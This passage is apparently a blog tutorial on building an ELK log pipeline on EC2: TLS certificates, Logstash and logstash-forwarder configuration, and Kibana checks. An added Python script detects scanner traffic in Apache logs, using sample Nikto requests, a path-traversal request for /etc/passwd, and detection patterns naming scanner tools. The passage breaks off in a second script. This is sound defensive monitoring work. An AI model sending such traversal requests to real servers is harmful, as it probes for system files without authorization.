<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace;">sudo mkdir /etc/pki/tls/private</span><span style="font-family: "courier";"><o:p></o:p></span><br />
<span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="color: #0e0e0e; font-family: "verdana" , sans-serif;">Now we will edit the openssl.cnf
file so that later on we won’t face any issues when we compile our logstash-forwader using </span><span style="font-family: "verdana" , sans-serif;"><span style="background-color: #f8f8f8; color: #333333; line-height: 20.399999618530273px;">go1.3 linux/amd64</span><span style="color: #0e0e0e;"> </span></span><span style="color: #0e0e0e; font-family: "verdana" , sans-serif;">on EC2_A (More
details </span><a href="https://github.com/elasticsearch/logstash-forwarder/issues/221" style="font-family: Verdana, sans-serif;">here</a><span style="color: #0e0e0e; font-family: "verdana" , sans-serif;">)</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier";"><br /></span><span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;">Vi /etc/ssl/openssl.cnf</span><span style="font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">In the [v3_ca] section add the following entry<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">subjectAltName = IP:192.168.2.2</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Note: Here the IP address has to be of the EC2_B. machine.</span><span style="font-family: "courier";"><o:p></o:p></span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><b>Now lets create a index on our Elastic cluster:</b></span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">Lets first install a plugin named "head"</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span><span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;">cd ~/elasticsearch-1.1.1/</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;">bin/plugin --install mobz/elasticsearch-head</span><br />
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">Now go to http://IP(EC2_B):9200/_plugin/head/</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">Go to indices tab and create a new index called "apache"</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxkzSHHDhFxgflIqtcdwsZdeeZw7TvVStnSM-y2kSJsef1BgtYd5a6ALSMD8W3m8aoEUNxpsHhdC7UM7tuwfx5SGipn8_9tqz2tWBz3JmQCOFMRqdIpC3X5jccJgkfMAjx2TyKDrwBMkM/s1600/Screen+Shot+2014-07-27+at+6.16.03+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxkzSHHDhFxgflIqtcdwsZdeeZw7TvVStnSM-y2kSJsef1BgtYd5a6ALSMD8W3m8aoEUNxpsHhdC7UM7tuwfx5SGipn8_9tqz2tWBz3JmQCOFMRqdIpC3X5jccJgkfMAjx2TyKDrwBMkM/s1600/Screen+Shot+2014-07-27+at+6.16.03+pm.png" width="640" /></a></div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana";"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><b>Now Generate the Self signed certs</b></span><span style="font-family: "courier";">:</span></div>
</div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #0e0e0e;">cd /etc/pki/tls; sudo openssl req
-x509 -batch -nodes -newkey rsa:2048 -keyout private/logstash-forwarder.key
-out certs/logstash-forwarder.crt</span><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="color: #0e0e0e; font-family: "verdana" , sans-serif;">The same certificate
"logstash-forwarder.crt” has to be imported to logstash_forwader server
(EC2_A). Please do this using appropriate “scp” commands.</span><span style="font-family: "courier new" , "courier" , monospace;"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="color: #0e0e0e; font-family: "verdana" , sans-serif;"><b><br /></b></span>
<span style="color: #0e0e0e; font-family: "verdana" , sans-serif;"><b>Configure Logstash:</b></span><span style="font-family: "courier new" , "courier" , monospace;"><o:p></o:p></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace;">nano ~/</span><span style="font-family: "courier new" , "courier" , monospace;">logstash-1.4.2/logstash.conf</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<div class="MsoNormal">
<span style="font-family: "courier";">input {<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> lumberjack {<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> port
=> 5000<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> type
=> "apache-access"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";">
ssl_certificate => "/etc/pki/tls/certs/logstash- forwarder.crt"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> ssl_key
=> "/etc/pki/tls/private/logstash-forwarder.key" <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";">}<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";">}<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";">filter {<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> grok {<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> type
=> "apache-access"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> pattern
=> "%{COMBINEDAPACHELOG}"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> }<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";">}<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";">output { <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> elasticsearch
{<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> host => localhost<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> protocol => http<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> index =>
“apache"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> cluster =>
"elasticsearch"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "courier";"> index_type =>
"apache"<o:p></o:p></span></div>
<!--EndFragment--><br />
<div class="MsoNormal">
<span style="font-family: "courier";"> }
}<o:p></o:p></span></div>
</div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">This creates a configuration file that makes Logstash listen on port 5000 for the lumberjack protocol and accept incoming logs from the logstash-forwarder over TLS, using the certificate and key configured above. The grok filter uses %{COMBINEDAPACHELOG} because we will be sending Apache access logs (combined log format) from the EC2_A server; events that do not match the pattern are still indexed, but carry the _grokparsefailure tag, which is worth a panel of its own so that format changes do not go unnoticed.</span></div>
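<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">As an added example (it is not part of the original post and not Logstash project code), the Python script below does offline what the pipeline above does in Logstash: it parses Apache combined log lines with a regex equivalent to %{COMBINEDAPACHELOG}, producing the same field names grok assigns, and then runs two checks over the events that you would otherwise build as Kibana panels on the "apache" index: a per-client forced-browsing check (many requests, mostly 4xx) and a per-request check for scanner user-agents, path traversal and malformed request lines. The sample log lines, addresses, user-agent strings and thresholds are constructed for the example.</span></div>

```python
"""Offline stand-in for the pipeline above: parse Apache "combined"
access-log lines the way the %{COMBINEDAPACHELOG} grok pattern does,
then run two checks over the events of the kind a Kibana dashboard on
the "apache" index is normally used for."""
import re
from collections import defaultdict

# Python equivalent of grok's COMBINEDAPACHELOG. The group names are the
# field names grok assigns, so each event looks like what Logstash indexes.
# grok's QS keeps the quotes around referrer/agent; they are dropped here.
COMBINEDAPACHELOG = re.compile(
    r'^(?P<clientip>\S+) (?P<ident>\S+) (?P<auth>\S+) '
    r'\[(?P<timestamp>[^\]]+)\] '
    r'"(?:(?P<verb>[A-Z]+) (?P<request>\S+)(?: HTTP/(?P<httpversion>[\d.]+))?'
    r'|(?P<rawrequest>[^"]*))" '
    r'(?P<response>\d{3}) (?P<bytes>\d+|-)'
    r'(?: "(?P<referrer>[^"]*)" "(?P<agent>[^"]*)")?$'
)

# Constructed sample lines (RFC 5737 documentation addresses), not taken
# from any real server: two normal hits, a Nikto scan, a TLS handshake
# sent to the plain-HTTP port, and one line that is not an access-log entry.
UA = "Mozilla/5.0 (X11; Linux x86_64) Firefox/30.0"
NIKTO = "Mozilla/5.00 (Nikto/2.1.5)"
SAMPLE_LINES = [
    f'192.0.2.10 - - [27/Jul/2014:18:19:01 +0000] "GET / HTTP/1.1" 200 3525 "-" "{UA}"',
    f'192.0.2.10 - - [27/Jul/2014:18:19:03 +0000] "GET /icons/ubuntu-logo.png HTTP/1.1" 200 3623 "http://203.0.113.5/" "{UA}"',
    f'198.51.100.7 - - [27/Jul/2014:18:20:10 +0000] "GET /admin/ HTTP/1.1" 404 504 "-" "{NIKTO}"',
    f'198.51.100.7 - - [27/Jul/2014:18:20:10 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 504 "-" "{NIKTO}"',
    f'198.51.100.7 - - [27/Jul/2014:18:20:11 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 504 "-" "{NIKTO}"',
    f'198.51.100.7 - - [27/Jul/2014:18:20:11 +0000] "GET /../../etc/passwd HTTP/1.1" 400 301 "-" "{NIKTO}"',
    f'198.51.100.7 - - [27/Jul/2014:18:20:12 +0000] "GET /server-status HTTP/1.1" 403 290 "-" "{NIKTO}"',
    r'203.0.113.9 - - [27/Jul/2014:18:21:00 +0000] "\x16\x03\x01" 400 0 "-" "-"',
    'this line is not an access log entry',
]

# Illustrative scanner signatures; a real list would be longer and maintained.
SCANNER_AGENTS = ("nikto", "sqlmap", "nmap scripting engine", "masscan", "zgrab")
TRAVERSAL = re.compile(r"\.\./|/etc/passwd|%2e%2e", re.IGNORECASE)


def parse_line(line):
    """Return one Logstash-style event dict. Lines the pattern does not match
    keep the raw message and get the _grokparsefailure tag, as grok does."""
    m = COMBINEDAPACHELOG.match(line.rstrip("\n"))
    if m is None:
        return {"message": line, "tags": ["_grokparsefailure"]}
    ev = m.groupdict()
    # grok leaves these as strings; integers are handier for the checks below.
    ev["response"] = int(ev["response"])
    ev["bytes"] = 0 if ev["bytes"] == "-" else int(ev["bytes"])
    ev["referrer"] = ev["referrer"] or "-"
    ev["agent"] = ev["agent"] or "-"
    ev["message"] = line
    ev["tags"] = []
    return ev


def parse_log(lines):
    return [parse_line(line) for line in lines]


def noisy_clients(events, min_requests=5, min_error_ratio=0.6):
    """Clients with at least min_requests requests of which a share of
    min_error_ratio or more were 4xx: the footprint of forced browsing."""
    per_ip = defaultdict(lambda: [0, 0])  # clientip -> [total, 4xx]
    for ev in events:
        if "_grokparsefailure" in ev["tags"]:
            continue
        stats = per_ip[ev["clientip"]]
        stats[0] += 1
        if 400 <= ev["response"] < 500:
            stats[1] += 1
    return sorted(ip for ip, (total, errors) in per_ip.items()
                  if total >= min_requests and errors / total >= min_error_ratio)


def suspicious_requests(events):
    """(clientip, target, reasons) for every event showing scanner traits."""
    hits = []
    for ev in events:
        if "_grokparsefailure" in ev["tags"]:
            continue
        reasons = []
        target = ev["request"] or ev["rawrequest"] or ""
        if any(sig in ev["agent"].lower() for sig in SCANNER_AGENTS):
            reasons.append("scanner user-agent")
        if TRAVERSAL.search(target):
            reasons.append("path traversal")
        if ev["rawrequest"] is not None:  # request line was not "VERB path HTTP/x"
            reasons.append("malformed request line")
        if reasons:
            hits.append((ev["clientip"], target, reasons))
    return hits


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LINES)
    print("grok failures:", sum("_grokparsefailure" in e["tags"] for e in evs))
    print("forced-browsing clients:", noisy_clients(evs))
    for ip, target, reasons in suspicious_requests(evs):
        print(ip, target, ", ".join(reasons))
```

<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">The same three ideas carry straight over to Kibana once the events are indexed: a terms panel on clientip filtered to response:[400 TO 499] gives the forced-browsing view, a query on agent for the scanner strings gives the second check, and a filter on tags:_grokparsefailure shows the lines the grok filter could not parse, which here also catches the binary request line that Apache logs when a TLS handshake hits the plain-HTTP port.</span></div>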
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><b>Now setting up our EC2_A server
(Logstash_Forwarder/Shipper):</b></span><br />
<span style="font-family: "verdana" , sans-serif;"><b><br /></b></span>
<span style="font-family: "verdana" , sans-serif;"><b>EC2_A</b>:</span><span style="font-family: "courier new" , "courier" , monospace;"> (Micro instance) <span style="background-color: white; color: #444444; font-weight: bold; line-height: 18.200000762939453px;">Ubuntu Server 14.04_64bit: </span>Linux ip-192.168.2.1 3.13.0-29-generic #53-Ubuntu SMP Wed Jun 4 21:00:20 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">Make
sure the Apache server is running on this machine (refer to the first step if it is not). Java is only needed on EC2_B for Elasticsearch and Logstash; the forwarder itself is a Go binary. </span><span style="font-family: "verdana" , sans-serif;">This machine will be used as the shipper that sends
the Apache logs to EC2_B.</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ wget -O logstash-forwarder-master.zip <span style="color: #0000e9;"><a href="https://github.com/elasticsearch/logstash-forwarder/archive/master.zip">https://github.com/elasticsearch/logstash-forwarder/archive/master.zip</a></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ unzip logstash-forwarder-master.zip<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ cd logstash-forwarder-master</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><b>Installing the developer tools:</b></span><span style="font-family: "courier new" , "courier" , monospace;"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ </span><span style="font-family: "courier new" , "courier" , monospace;">sudo apt-get install build-essential<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><b><br /></b></span>
<span style="font-family: "verdana" , sans-serif;"><b>Installing Go:</b></span><span style="font-family: "courier new" , "courier" , monospace;"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ </span><span style="font-family: "courier new" , "courier" , monospace;">sudo apt-get install python-software-properties<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ sudo apt-add-repository ppa:duh/golang<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ sudo apt-get update<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ sudo apt-get install golang<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ </span><span style="font-family: "courier new" , "courier" , monospace;">sudo apt-get install ruby rubygems ruby-dev<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ </span><span style="font-family: "courier new" , "courier" , monospace;">sudo gem install fpm<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><b>Creating the forwarder deb
package.</b></span><span style="font-family: "courier new" , "courier" , monospace;"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ </span><span style="font-family: "courier new" , "courier" , monospace;">umask </span><span style="font-family: "courier new" , "courier" , monospace;">022</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ make deb<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">You'll see a long sequence of compilation and then
some final execution as the </span><span style="font-family: "courier new" , "courier" , monospace;">fpm </span><span style="font-family: "courier new" , "courier" , monospace;">command runs and creates the DEB package.</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">Listing 1.34: </span><span style="font-family: "courier new" , "courier" , monospace;">Forwarder make output</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilaQaxefzVRM0xjqwPY8W2Co9e38Rk9NsJdfm-cIQgnTapUKiR7Js2r_GaWa4dS9X2ndXJ6JQ1ZAAwAFgufHDbdi-6VazfmS0sMboqPsMCA5HMtTkQmryFrDc1ZF2uptk_DSf0LJYkqV8/s1600/Screen+Shot+2014-07-27+at+6.19.01+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilaQaxefzVRM0xjqwPY8W2Co9e38Rk9NsJdfm-cIQgnTapUKiR7Js2r_GaWa4dS9X2ndXJ6JQ1ZAAwAFgufHDbdi-6VazfmS0sMboqPsMCA5HMtTkQmryFrDc1ZF2uptk_DSf0LJYkqV8/s1600/Screen+Shot+2014-07-27+at+6.19.01+pm.png" width="640" /></a></div>
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><b>Installing the forwarder:</b></span><span style="font-family: "times"; mso-bidi-font-family: Times;"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ sudo
dpkg -i logstash-forwarder_0.2.0_amd64.deb</span><o:p></o:p></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">Use the exact file name that the fpm step printed at the end of make deb: the version comes from the checkout and the architecture suffix from the build host, so on the x86_64 instance above the package is built as amd64, not i386.</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">Now create a folder for the "logstash-forwarder.crt" certificate and copy into it the "logstash-forwarder.crt" file
that we created on the EC2_B server (scp it across from EC2_B). The forwarder uses this file as its CA bundle and verifies the Logstash server's certificate against it, so the certificate must have been issued for the host name or IP you put into the "servers" list below; when that entry is an IP address, the certificate needs that IP as a subjectAltName, otherwise the forwarder refuses to connect and logs an x509 error about missing IP SANs.<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ sudo mkdir -p /etc/certs</span><span style="font-family: "times"; mso-bidi-font-family: Times;"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">Place
the "logstash-forwarder.crt" file in the /etc/certs folder. Also, </span><span style="font-family: "verdana" , sans-serif;">create the logstash-forwarder
configuration file:</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ sudo nano
/etc/logstash-forwarder/logstash-forwarder.conf <o:p></o:p></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">Replace IP[EC2_B] below with the IP of your Logstash server, which must be the address the certificate was issued for:</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<div class="MsoNormal">
<span style="color: black; font-family: "courier";">{</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";">"network":</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";"> {</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";">"servers": [
"IP[EC2_B]:5000" ],</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";">"ssl ca":
"/etc/certs/logstash-forwarder.crt",</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";">"timeout": 15</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";"> },</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";">"files": [</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";"> {</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";">"paths":
["/var/log/apache2/access.log"],</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";">"fields": { "type":
"apache-access" }</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";"> }</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";">
]</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";">}</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
</div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br />
<span style="font-family: "verdana" , sans-serif;"><b>Now Start the forwarder:</b></span><br />
<div dir="ltr">
<span style="font-family: "courier new" , "courier" , monospace;">$ cd /opt/logstash-forwarder</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">$ sudo bin/logstash-forwarder -config="/etc/logstash-forwarder/logstash-forwarder.conf" &</span><br />
<span style="font-family: "verdana" , sans-serif;">The forwarder has to be able to read /var/log/apache2/access.log, which Ubuntu creates as root:adm with mode 640, so run it as root or as a user in the adm group; otherwise it cannot open the file and nothing is shipped.</span><br />
<span style="font-family: "verdana" , sans-serif;"><b><br /></b></span>
<span style="font-family: "verdana" , sans-serif;"><b>Finally Starting the Logstash Server on (EC2_B):</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">$ cd <span style="color: #0e0e0e;">~/</span>logstash-1.4.2/</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">$ bin/logstash -f logstash.conf &</span><span style="font-family: "verdana" , sans-serif;"><span style="font-size: x-small;"> (this starts the Logstash server)</span></span><br />
<br /></div>
</div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br />
<span style="font-family: "verdana" , sans-serif;">Any new entries in the access logs will now show up in your Kibana dashboard. To check the setup, hit the default Apache page at http://IP[EC2_A]/ and look for that request among the events your Elasticsearch cluster has recorded, as shown on the Kibana dashboard.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwXHn0K2Zu4KL7vflAyYqWHsVhfKqY1naRwjykvt2VBOczYPXcZTkz5L5CmnGbyCEi9Syx9hRTQzEZhkkVxnN3mBTXNVESThtdy0x-Z8BouO6RK0N5y5zTAnzjCaSdAP2lMoAK11RTFj8/s1600/Screen+Shot+2014-07-27+at+6.54.35+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwXHn0K2Zu4KL7vflAyYqWHsVhfKqY1naRwjykvt2VBOczYPXcZTkz5L5CmnGbyCEi9Syx9hRTQzEZhkkVxnN3mBTXNVESThtdy0x-Z8BouO6RK0N5y5zTAnzjCaSdAP2lMoAK11RTFj8/s1600/Screen+Shot+2014-07-27+at+6.54.35+pm.png" width="640" /></a></div>
<br /></div>
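<div class="MsoNormal"><span style="font-family: "verdana" , sans-serif;">Eyeballing Kibana is fine for a first test, but once the stack is in place a repeatable check is better. The script below is an added example and not part of the original post: it requests a unique, non-existent path on the Apache host and then polls Elasticsearch until the access-log line carrying that marker has been indexed, which proves the whole path (Apache log, logstash-forwarder, Logstash, Elasticsearch) end to end instead of relying on a glance at the dashboard. It assumes Logstash writes to the default <span style="font-family: "courier new" , "courier" , monospace;">logstash-*</span> indices and that Elasticsearch listens on port 9200 on EC2_B; the two addresses at the bottom are placeholders for IP[EC2_A] and IP[EC2_B].</span></div>

```python
"""Pipeline canary for the ELK setup above: send one request carrying a unique marker
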